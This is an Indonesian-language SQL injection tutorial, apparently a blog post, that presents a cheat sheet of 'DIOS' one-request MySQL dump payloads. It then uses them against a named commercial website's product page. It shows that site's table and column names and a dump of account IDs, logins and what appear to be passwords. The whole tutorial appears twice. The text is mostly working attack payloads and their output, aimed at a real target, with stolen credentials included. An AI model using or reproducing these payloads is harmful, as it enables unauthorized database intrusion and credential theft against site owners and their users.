Edun:
DIOS (Dump In One Shoot)
Artinya :: kita bisa Dump / mengeluarkan isi database dengan 1 kali request..
singkat sejarah ::
DIOS pertama kali di perkenalkan oleh Profexer (rdot.org) lalu dikembangkan oleh M@dbl00d (Mas fuad-Sec7or team) ,Zen Javanicus (securityidiots.com) ,MakMan ,dan temen2 injector lainnya ..
lets croot :D
/*! PENTING save di tempat yang aman */
-------- DIOS cheatsheet ---------
Query utk Dump Semua Tabel dan Kolom..
======================================
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
=======================================
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
=======================================
(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)be
======================================
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))
---------------------------------------
pilih salah satu Query DIOS..
target :: http://www.icpconcepts.com/produit.php?id=55
Aku anggap kalian sudah bisa menemukan magic number...
Langsung replace column 21 / magic number nya dengan DIOS query :p
kita coba dump semua tabel dan kolom ::
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),22,23,24,25,26,27,28,29,30--+
-- Result ---
User :: id
User :: code
User :: id_parrain
User :: origine
User :: specialite
User :: nom
User :: prenom
User :: adresse
User :: cp
User :: ville
User :: pays
User :: mail
User :: telephone
User :: login
User :: mdp
User :: type
User :: is_active
User :: l_nom
User :: l_prenom
User :: l_adresse
User :: l_cp
User :: l_ville
User :: l_pays
User :: l_telephone
User :: perle
User :: is_parrain_credite
User :: message
User :: id_commercial
User :: source
User :: source_name
User :: zone_pays
User :: siret
connexion :: id
connexion :: login
connexion :: passwd
connexion :: email
connexion :: nom_connexion
bla bla bla bla .....
kan kita uda tahu nama tabel dan culumn name ,untuk dump / extrak data bgini ::
kita coba dump dari Tabel "connexion" column "id", "login" ,dan "passwd" ..
/*! perhatikan baik2 query yg berubah. */
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(connexion)where(@x:=concat+(@x,0x3c62723e,id,0x203a3a20,login,0x203a3a20,passwd))))x),22,23,24,25,26,27,28,29,30--+
--Result--
1 :: Admin2016 :: 3x!/ICQE6a
4 :: lvialeton :: 3x!/ICQE62017
6 :: ISALVT :: 3x!/ICQE6a
9 :: MOLHO :: 3x!/ICQE6a
8 :: VERRIER :: 3x!/ICQE6a
10 :: BILINSKI :: 3x!/ICQE6a
11 :: LESAGER :: 3x!/ICQE6a
15 :: chloe :: 3x!/ICQE6a
#Nb
kalian bisa modif query nya :D
tambahin tag2 html/ sql Command dalam concat()
contoh ::
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(0x3c666f6e7420636f6c6f723d626c75653e4d522e3534314e542d3344554e543c2f666f6e743e,0x3c62723e4461746162617365203a3a20,database(),0x3c62723e4d7953514c2056657273696f6e203a3a20,version(),0x3c62723e43757272656e742055736572203a3a20,user(),0x3c62723e2053796d6c696e6b203a3a20,@@Global.have_symlink,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),22,23,24,25,26,27,28,29,30--+
Penjelasan ::
kita bs memasukkan Tag2 html pada saat injeksi web..
seperti <font>
dll dengan syarat harus di convert dalam hex .lalu depannya dikasih 0x.
be
Source : SBH
DIOS (Dump In One Shoot)
Artinya :: kita bisa Dump / mengeluarkan isi database dengan 1 kali request..
singkat sejarah ::
DIOS pertama kali di perkenalkan oleh Profexer (rdot.org) lalu dikembangkan oleh M@dbl00d (Mas fuad-Sec7or team) ,Zen Javanicus (securityidiots.com) ,MakMan ,dan temen2 injector lainnya ..
lets croot :D
/*! PENTING save di tempat yang aman */
-------- DIOS cheatsheet ---------
Query utk Dump Semua Tabel dan Kolom..
======================================
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
=======================================
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
=======================================
(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)be
======================================
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))
---------------------------------------
pilih salah satu Query DIOS..
target :: http://www.icpconcepts.com/produit.php?id=55
Aku anggap kalian sudah bisa menemukan magic number...
Langsung replace column 21 / magic number nya dengan DIOS query :p
kita coba dump semua tabel dan kolom ::
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),22,23,24,25,26,27,28,29,30--+
-- Result ---
User :: id
User :: code
User :: id_parrain
User :: origine
User :: specialite
User :: nom
User :: prenom
User :: adresse
User :: cp
User :: ville
User :: pays
User :: mail
User :: telephone
User :: login
User :: mdp
User :: type
User :: is_active
User :: l_nom
User :: l_prenom
User :: l_adresse
User :: l_cp
User :: l_ville
User :: l_pays
User :: l_telephone
User :: perle
User :: is_parrain_credite
User :: message
User :: id_commercial
User :: source
User :: source_name
User :: zone_pays
User :: siret
connexion :: id
connexion :: login
connexion :: passwd
connexion :: email
connexion :: nom_connexion
bla bla bla bla .....
kan kita uda tahu nama tabel dan culumn name ,untuk dump / extrak data bgini ::
kita coba dump dari Tabel "connexion" column "id", "login" ,dan "passwd" ..
/*! perhatikan baik2 query yg berubah. */
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(connexion)where(@x:=concat+(@x,0x3c62723e,id,0x203a3a20,login,0x203a3a20,passwd))))x),22,23,24,25,26,27,28,29,30--+
--Result--
1 :: Admin2016 :: 3x!/ICQE6a
4 :: lvialeton :: 3x!/ICQE62017
6 :: ISALVT :: 3x!/ICQE6a
9 :: MOLHO :: 3x!/ICQE6a
8 :: VERRIER :: 3x!/ICQE6a
10 :: BILINSKI :: 3x!/ICQE6a
11 :: LESAGER :: 3x!/ICQE6a
15 :: chloe :: 3x!/ICQE6a
#Nb
kalian bisa modif query nya :D
tambahin tag2 html/ sql Command dalam concat()
contoh ::
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(0x3c666f6e7420636f6c6f723d626c75653e4d522e3534314e542d3344554e543c2f666f6e743e,0x3c62723e4461746162617365203a3a20,database(),0x3c62723e4d7953514c2056657273696f6e203a3a20,version(),0x3c62723e43757272656e742055736572203a3a20,user(),0x3c62723e2053796d6c696e6b203a3a20,@@Global.have_symlink,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),22,23,24,25,26,27,28,29,30--+
Penjelasan ::
kita bs memasukkan Tag2 html pada saat injeksi web..
seperti <font>
dll dengan syarat harus di convert dalam hex .lalu depannya dikasih 0x.
be
Source : SBH
0 Comments